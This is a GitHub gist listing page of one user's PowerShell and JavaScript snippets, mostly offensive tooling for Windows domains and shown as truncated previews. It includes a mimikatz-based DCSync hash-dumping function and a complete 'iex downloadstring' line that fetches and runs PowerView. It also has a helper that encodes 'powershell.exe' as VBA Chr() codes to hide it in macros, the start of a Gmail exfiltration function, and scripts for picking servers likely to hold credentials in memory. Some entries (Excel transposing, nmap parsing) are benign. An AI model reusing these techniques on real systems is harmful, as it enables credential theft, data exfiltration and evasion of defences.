Daniel Ferreira daniel0x00
daniel0x00
/ Invoke-DCSync.ps1
Created
May 2, 2016 17:54
— forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-DCSync | |
| { | |
| <# | |
| .SYNOPSIS | |
| Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
| Author: @monoxgas | |
| Improved by: @harmj0y |
daniel0x00
/ PowerViewFirstChecks.ps1
Last active
June 15, 2017 21:27
AD querys using PowerView to get first misconfiguration and bad habits on domain users and domain admins.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Download and invoke PowerView: | |
| iex(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') | |
| # All admin users of default domain: | |
| $filename = 'admins_default_domain'; $out = Get-NetUser -AdminCount; Export-Clixml $filename'.out' -InputObject $out; "All admins in the domain. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort lastlogontimestamp | ft -wrap -autosize >> $filename'.txt' | |
| # All enabled users (including admins) with no-password setting | |
| $filename = 'users_no_password_default_domain'; $out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with no-password setting. Means this users could have weak passwords or even no password at all. Count: $($out.count) |
daniel0x00
/ js_string_to_chr.js
Last active
September 5, 2016 09:42
JavaScript converter from string to Chr(x) ASCII codes in VBA
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var to_chr = "powershell.exe"; | |
| var return_string = ""; | |
| var chars_max_return = 60; | |
| for (var x=0, len=to_chr.length; x<len; x++) { | |
| return_string += 'Chr('+to_chr[x].charCodeAt(0)+') & '; | |
| if ((x > 0) && ((x % chars_max_return) == 0)) { console.log(return_string.substr(0,return_string.length - 3)); return_string = ""; } | |
| } | |
| console.log(return_string.substr(0,return_string.length - 3)); |
daniel0x00
/ Do-GmailExfiltration.ps1
Created
July 20, 2016 11:15
PowerShell simple gmail exfiltration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Do-GmailExfiltration | |
| { | |
| [CmdletBinding()] | |
| param( | |
| [Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)] | |
| [String] | |
| $Data, | |
| [Parameter(Position = 1, Mandatory = $True)] | |
| [String] |
daniel0x00
/ Invoke-ExcelTransposing.ps1
Created
January 9, 2017 15:48
PowerShell Excel transposing script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-ExcelTransposing { | |
| [CmdletBinding()] | |
| [OutputType([psobject])] | |
| param( | |
| [Parameter(Mandatory=$true, ValueFromPipelineByPropertyName=$true)] | |
| [string] $FileName, | |
| [Parameter(Mandatory=$false, ValueFromPipelineByPropertyName=$true)] | |
| [string] $SheetName='Sheet1' | |
| ) |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-WinMI | |
| { | |
| [CmdletBinding(DefaultParameterSetName="Command")] | |
| Param( | |
| [Parameter(Position = 0)] | |
| [String[]] | |
| $ComputerName, | |
| [Parameter(ParameterSetName = "CustomCommand", Position = 1)] |
daniel0x00
/ Get-DomainControllerStartTime.ps1
Last active
April 21, 2017 14:15
PowerShell script to retrieve a list of all Domain Controllers on a domain, including also the StartTime (last reboot) of each DC.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # | |
| # PowerShell script to retrieve a list of all Domain Controllers on a domain, including also the StartTime (last reboot) of each DC. | |
| # Useful: | |
| # - For determine which server could be affected for a non-patched vulnerability. | |
| # - For determine which server could have more credentials in its memory. | |
| # ### | |
| # No admin privilege required to run this script. | |
| # PowerShell version 2 is required. | |
| # ### |
daniel0x00
/ Get-ComputerStartTime.ps1
Last active
April 24, 2017 14:40
PowerShell script to retrieve the StartTime (last reboot) for a given computer list
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # | |
| # PowerShell script to retrieve the StartTime (last reboot) of given computers. | |
| # Useful: | |
| # - For determine which server could be affected for a non-patched vulnerability. | |
| # - For determine which server could have more credentials in its memory. | |
| # ### | |
| # No admin privilege required to run this script. | |
| # PowerShell version 2 is required. | |
| # ### |
daniel0x00
/ Get-NetworkStatistics.ps1
Created
June 14, 2017 14:07
Get-NetworkStatistics downloaded from gallery.technet.microsoft.com, original author Cookie.Monster
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-NetworkStatistics { | |
| <# | |
| .SYNOPSIS | |
| Display current TCP/IP connections for local or remote system | |
| .FUNCTIONALITY | |
| Computers | |
| .DESCRIPTION | |
| Display current TCP/IP connections for local or remote system. Includes the process ID (PID) and process name for each connection. |
daniel0x00
/ Convert-NmapOutput.ps1
Last active
April 25, 2020 18:21
Convert nmap 'grepeable' output into a PowerShell PSObject
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Deprecated. | |
| # Usage: | |
| # nmap 'grepeable' scan: nmap -oG outputfile.txt --open google.com | |
| # when scan finishes, run: | |
| # Get-Content outputfile.txt | Convert-NmapOutput | |
| # | |
| function Convert-NmapOutput { | |
| [CmdletBinding()] | |
| [OutputType([psobject])] |
OlderNewer